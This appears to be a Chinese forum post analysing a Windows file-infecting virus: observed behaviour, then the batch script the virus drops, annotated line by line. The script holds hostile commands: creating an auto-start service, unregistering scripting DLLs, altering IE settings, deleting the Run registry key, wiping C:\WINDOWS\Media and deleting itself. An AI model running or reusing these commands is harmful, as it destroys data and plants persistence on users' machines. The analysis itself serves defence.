并没有发现运行正常exe也会触发同名的exe.exe
只是运行exe.exe才会使病毒复发
还会在C:\Documents and Settings\All Users\「开始」菜单\程序\启动下添加exe.exe的快捷方式
我虚拟机上添加的是C:\Documents and Settings\All Users\「开始」菜单\程序\启动\C:\Program Files\COMODO\COMODO Internet Security\cfp.exe.EXE.lnk
病毒发作时....任务管理器 没法用,会直接结束进程....不清楚用的是哪种方法,改名同样不行
非系统盘里的exe会直接感染,之后运行时会释放同名的exe.tmp并运行
生成的bat:
59DG54J1AC79P02IQG6MQ97HY
sc.exe create E9RRVFRBinPath= "C:\Program Files\JBSX3C2V\TG2ASKY.exe -start" type= own type= interact start= auto DisplayName= E2P24AVB
ZC944X3XVQZAZKS9X
在注册表和服务数据库中创建服务
regsvr32.exe /u /s shimgvw.dll
TSOMWJSPWM23THW
regsvr32.exe /u /s itss.dll
Q6FHCQGX0AA3NI3BKTM
regsvr32.exe /u /s scrrun.dll
LZLY9JDZ53YJ95JGB
regsvr32.exe /u /s vbscript.dll
GTS0IZEB2EATWB3SAHIZW
regsvr32.exe /s jscript.dll
......反注册部分dllDMYNN4C23HIH35XD8TP
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Background_Sounds /t REG_SZ /d
no /F
用no强行覆盖yesF5AUD8XN6T572FT
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Animations /t REG_SZ /d no /F
96D298QUZQJZ7
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Videos" /t REG_SZ /d no /F
69CU40V6OIN3J0OBS4
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
10HHPQP4UKZD8B2
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DisableScriptDebuggerIE /t REG_SZ /d yes /F 禁止脚本调试
YUPEK1BZU5LUHYCGNDJG
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Disable Script Debugger" /t REG_SZ /d yes /F
TNV0ZEYR6EVKAWDLP
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F 删除启动项
NG2PJM0KIXATHQ
del C:\WINDOWS\Media\*.* /Q 删除media下的文件
KA8CQ7SISICMHTRH74Q
del %0 删除自身
exit
F6VG1PKDU0DKX17X